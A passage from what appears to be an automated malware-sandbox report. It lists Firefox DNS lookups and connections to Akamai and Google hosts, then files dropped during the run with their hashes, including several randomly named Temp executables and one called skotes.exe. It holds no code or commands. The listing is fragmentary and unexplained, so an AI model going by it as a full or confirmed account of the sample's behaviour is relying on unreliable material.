                  88.221.134.209
                  88.221.134.155

                • 8.8.8.8:53
                  a19.dscg10.akamai.net
                  dns
                  firefox.exe
                  67 B
                  99 B
                  1
                  1

                  DNS Request

                  a19.dscg10.akamai.net

                  DNS Response

                  88.221.134.155
                  88.221.134.209

                • 8.8.8.8:53
                  a19.dscg10.akamai.net
                  dns
                  firefox.exe
                  67 B
                  123 B
                  1
                  1

                  DNS Request

                  a19.dscg10.akamai.net

                  DNS Response

                  2a02:26f0:a1::58dd:869b
                  2a02:26f0:a1::58dd:86d1

                • 8.8.8.8:53
                  redirector.gvt1.com
                  dns
                  firefox.exe
                  65 B
                  81 B
                  1
                  1

                  DNS Request

                  redirector.gvt1.com

                  DNS Response

                  142.250.180.14

                • 8.8.8.8:53
                  redirector.gvt1.com
                  dns
                  firefox.exe
                  65 B
                  81 B
                  1
                  1

                  DNS Request

                  redirector.gvt1.com

                  DNS Response

                  142.250.180.14

                • 8.8.8.8:53
                  redirector.gvt1.com
                  dns
                  firefox.exe
                  65 B
                  93 B
                  1
                  1

                  DNS Request

                  redirector.gvt1.com

                  DNS Response

                  2a00:1450:4009:81e::200e

                • 142.250.180.14:443
                  redirector.gvt1.com
                  https
                  firefox.exe
                  3.2kB
                  9.3kB
                  7
                  10
                • 8.8.8.8:53
                  r1---sn-5hnekn76.gvt1.com
                  dns
                  firefox.exe
                  71 B
                  116 B
                  1
                  1

                  DNS Request

                  r1---sn-5hnekn76.gvt1.com

                  DNS Response

                  209.85.226.6

                • 8.8.8.8:53
                  r1.sn-5hnekn76.gvt1.com
                  dns
                  firefox.exe
                  69 B
                  85 B
                  1
                  1

                  DNS Request

                  r1.sn-5hnekn76.gvt1.com

                  DNS Response

                  209.85.226.6

                • 8.8.8.8:53
                  r1.sn-5hnekn76.gvt1.com
                  dns
                  firefox.exe
                  69 B
                  97 B
                  1
                  1

                  DNS Request

                  r1.sn-5hnekn76.gvt1.com

                  DNS Response

                  2a00:1450:400e::6

                • 209.85.226.6:443
                  r1.sn-5hnekn76.gvt1.com
                  https
                  firefox.exe
                  1.8kB
                  5.9kB
                  5
                  7
                • 8.8.8.8:53
                  play.google.com
                  dns
                  firefox.exe
                  61 B
                  77 B
                  1
                  1

                  DNS Request

                  play.google.com

                  DNS Response

                  142.250.179.238

                • 8.8.8.8:53
                  play.google.com
                  dns
                  firefox.exe
                  61 B
                  77 B
                  1
                  1

                  DNS Request

                  play.google.com

                  DNS Response

                  142.250.179.238

                • 8.8.8.8:53
                  play.google.com
                  dns
                  firefox.exe
                  61 B
                  89 B
                  1
                  1

                  DNS Request

                  play.google.com

                  DNS Response

                  2a00:1450:4009:81d::200e

                • 142.250.179.238:443
                  play.google.com
                  https
                  firefox.exe
                  3.3kB
                  9.3kB
                  8
                  10
                • 8.8.8.8:53
                  consent.youtube.com
                  dns
                  firefox.exe
                  65 B
                  81 B
                  1
                  1

                  DNS Request

                  consent.youtube.com

                  DNS Response

                  142.250.200.14

                • 8.8.8.8:53
                  consent.youtube.com
                  dns
                  firefox.exe
                  65 B
                  81 B
                  1
                  1

                  DNS Request

                  consent.youtube.com

                  DNS Response

                  142.250.200.14

                • 142.250.200.14:443
                  consent.youtube.com
                  https
                  firefox.exe
                  2.3kB
                  3.4kB
                  4
                  8

                MITRE ATT&CK Enterprise v15

                Downloads

                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\activity-stream.discovery_stream.json.tmp

                  Filesize

                  32KB

                  MD5

                  10877cecf018f6bea78dbb175b4776e8

                  SHA1

                  5274367db25fae477a55542b5581986555fc2bc3

                  SHA256

                  4d4acab60bbb83010fdad81c1befdc0f4ce5bb8ad1880350bb2ffaa7d854269e

                  SHA512

                  48af6543963d43a2c754c0dc893db6d0522f3e4131b936d8382fa100dacfae4973ec7a3b2c0ac0e332eba6a2c295afa10ed51f78a06eeed432845e5d90151f0c

                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                  Filesize

                  15KB

                  MD5

                  96c542dec016d9ec1ecc4dddfcbaac66

                  SHA1

                  6199f7648bb744efa58acf7b96fee85d938389e4

                  SHA256

                  7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                  SHA512

                  cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                • C:\Users\Admin\AppData\Local\Temp\1012851001\d1eb0cd776.exe

                  Filesize

                  1.7MB

                  MD5

                  c7901bd93db80072751e0bbc88cf2bc3

                  SHA1

                  611830be770290b0058f71a14ac81de635d2cc10

                  SHA256

                  1dbe8bcb5469c4810154570f2feaafb1a887bdc1aa97c6cdddb68f1d9499d6f7

                  SHA512

                  7e37023e41d5bf0e4e83ef84c131c996a174c120223afaee16b8be671d4fbdf6f3e7e7f660f3b6e73a78597ca9f3af31ecc1cd48bff08632a1167630bb5b2e49

                • C:\Users\Admin\AppData\Local\Temp\1012852001\165fa3ed5f.exe

                  Filesize

                  4.9MB

                  MD5

                  789b79d122173221ba3b85c7b08002e4

                  SHA1

                  53e2ff13b7a76fc6090e5247b49e6e9828c419a1

                  SHA256

                  d3192eae45cef7e5ac18e9c5bfdc88ea27815a27b9b5619fb75853e20361e576

                  SHA512

                  b72de5178fc6a1e90c8b7de12023b1e1b7bdeeabaf8875d0543f976c86653d088f3b13712fae8bbe2024c46b0853b6d7670bc0205ca9b3a5d5cffe143f0aab0c

                • C:\Users\Admin\AppData\Local\Temp\1012853001\a3af4d3bce.exe

                  Filesize

                  948KB

                  MD5

                  454eb5ad9da9d9a48dde6b5aaee0796f

                  SHA1

                  04791cb58b53f1cab386858acd545583f3233b7c

                  SHA256

                  5195df1106599d81f62e9a30ad995725c4d90403541601aeadee75e47cbf45cf

                  SHA512

                  bea2e0f222427f80fbca8967ec40599f0bfd7f2f304349cba255f69f7ad2742021f36c66c70203a3309b66af89a86292393cdbb7e0c9232468c7bd8c534ededa

                • C:\Users\Admin\AppData\Local\Temp\1012854001\27c0ef76e8.exe

                  Filesize

                  2.6MB

                  MD5

                  5c31c87a24fa448bb5c97a88f3442510

                  SHA1

                  6927671950c0ec1d33e1d94c5d8ee3d8ef906c7b

                  SHA256

                  69767c62c9e48334a6ddffffb0fc21dac94466f34006a08caa11440e0e54682d

                  SHA512

                  7c0139fcfd036df1b8f2b62cb1479baad2671759621c276e87fd50e37c5bb53de18a3b1e64dac4539c6d0aa9feff01cc2cfef05d166008a6c337400be7ea9f0d

                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                  Filesize

                  1.8MB

                  MD5

                  a93b02d857db3b12c32bd765b83825ab

                  SHA1

                  137f12047a081e6581e1d1a83c939d98514c3ff3

                  SHA256

                  553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa

                  SHA512

                  aab2bfd4090c77b87784d0110f5ee2dd24554fada9bdf9c2e8e08ff01a9025f5d8a7dfa2d4b89bf35cb037c162292a04f1084b87727b1bd201a9b5ab1b367bcd

                • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                  Filesize

                  442KB

                  MD5

                  85430baed3398695717b0263807cf97c

                  SHA1

                  fffbee923cea216f50fce5d54219a188a5100f41

                  SHA256

                  a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                  SHA512

                  06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                  Filesize

                  8.0MB

                  MD5

                  a01c5ecd6108350ae23d2cddf0e77c17

                  SHA1

                  c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                  SHA256

                  345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                  SHA512

                  b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin

                  Filesize

                  9KB

                  MD5

                  e5dc959214b9dd501fa3e098e719c415

                  SHA1

                  ab22cca6b322fbbfe5c3d2c4ca4ce3618bca4a52

                  SHA256

                  5941c50243713c9967d518324e958f4eed3659b4ca586eb4ee1e00ee4993d176

                  SHA512

                  2233a63c3cd494db71768a4455738cde3a9a67062fa6b9b6b5adb6eef7b4e1db0835394ba101762ef26c149bc3095fbc5c456ccffb5a80c3d9e534faf5b310b9

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin

                  Filesize

                  9KB

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\47ed02a4-0213-4b7d-aca4-e04ca3a8c7b6

                  Filesize

                  733B

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

                  Filesize

                  997KB

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

                  Filesize

                  116B

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

                  Filesize

                  479B

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

                  Filesize

                  372B

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

                  Filesize

                  11.8MB

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

                  Filesize

                  1KB

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

                  Filesize

                  1KB

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs-1.js

                  Filesize

                  7KB

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs-1.js

                  Filesize

                  7KB

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js

                  Filesize

                  6KB

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js

                  Filesize

                  6KB

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\sessionstore-backups\recovery.jsonlz4

                  Filesize

                  4KB
